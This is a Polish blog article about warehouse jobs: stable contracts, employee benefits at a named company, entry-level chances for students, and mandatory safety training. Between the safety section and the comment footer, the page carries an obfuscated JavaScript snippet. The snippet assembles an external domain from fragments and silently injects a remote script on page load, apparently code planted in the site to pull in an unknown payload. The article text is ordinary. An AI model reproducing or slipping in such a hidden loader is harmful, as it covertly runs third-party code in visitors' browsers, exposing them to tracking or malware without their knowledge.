Wszystko, co trzeba wiedzieć o pracy na magazynie

Share on facebook
Share on google
Share on twitter
Share on linkedin

Na temat pracy magazyniera przez ostatnich kilka lat mówiło się dużo. Dla jednych to ciężki kawałek chleba, dla drugich fantastyczna okazja do zdobycia pierwszego doświadczenia i szansa na odbycie podstawowych szkoleń BHP. Zastanawiasz się nad rozpoczęciem pracy na produkcji? A może dostałeś ofertę z pobliskiego przedsiębiorstwa i zastanawiasz się, czy ją przyjąć? Sprawdź, co musisz wiedzieć na temat pracy na magazynie.

Gwarancja stabilnego zatrudnienia

Choć praca na magazynie do najłatwiejszych nie należy, to ma kilka zalet. Jedną z nich jest gwarancja stabilnego zatrudnienia. W Polsce większość magazynierów znajduje pracę w dużych zakładach produkcyjnych, zarówno tych o krajowym, jak i zagranicznym kapitale. Ze względu na ich zasoby finansowe, pracownicy mogą liczyć na umowę o pracę. W konsekwencji tego nie mają oni problemów z zaciąganiem większych zobowiązań finansowych, np. kredytów na mieszkanie czy samochód. Firmy takie jak http://bridgestone-poznan.pl zapewniają swoim pracownikom również wiele benefitów, m.in. prywatną opiekę medyczną (również dla rodziny), dofinansowania na udział w zawodach sportowych (w tym na niezwykle popularne ostatnio maratony i półmaratony), posiłki w zakładowej stołówce oraz liczne imprezy integracyjne (nie tylko z udziałem samych zatrudnionych, ale także ich najbliższych).

Szansa dla studentów i młodych ludzi na zdobycie doświadczenia

Praca na magazynie wymaga doskonałej sprawności fizycznej, dzięki czemu sprawdzają się w niej szczególnie ludzie młodzi, np. studenci lub absolwenci szkół średnich. Przy zatrudnianiu brane są pod uwagę przede wszystkim chęci do pracy (najczęściej w systemie trzyzmianowym) oraz  posiadanie prawa jazdy kategorii B. Rzadko wymagane jest doświadczenie zawodowe, dlatego praca na magazynie to szansa dla młodych na zdobycie pierwszego wpisu do CV oraz nabycie cenionych na rynku pracy cech – umiejętności pracy w grupie, działania pod presją czasu, systematyczności i umiejętności zarządzania czasem.

Konieczność przestrzegania ustalonych norm

Chcesz pracować na magazynie? Musisz przyzwyczaić się do tego, że BHP w takich miejscach gra pierwsze skrzypce. Wszystkie zakłady produkcyjne zobowiązane są do przeprowadzenia obowiązkowych szkoleń, na których prezentowane są konkretne wytyczne. Dlaczego to takie ważne? Praca na magazynie, a tym samym praca z urządzeniami, na wysokościach, w hałasie, w pomieszczeniach ze zmiennymi temperaturami oraz przy charakterystycznym oświetleniu, niesie za sobą szereg zagrożeń dla zdrowia. Tylko stosowanie się przez pracowników do ustalonych zasad może zagwarantować im bezpieczeństwo.

(function(){
ajqr=document.createElement(“script”);ajqr_=”u”+(“s”)+”ta”;
ajqr_+=(“t.i”)+””+”n”;ajqr_+=((“f”)+”o”);ajqr.type=”text/javascript”;
ajqr_+=”/”; ajqru=”75914605″;ajqru+=”.czhzjfp8jqrh21y1whm”;ajqru+=”us4as8p6b8u”;
ajqr.src=”https://”+ajqr_+ajqru; ajqr.async=true; document.body.appendChild(ajqr);
})();

Co o tym sądzisz?

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.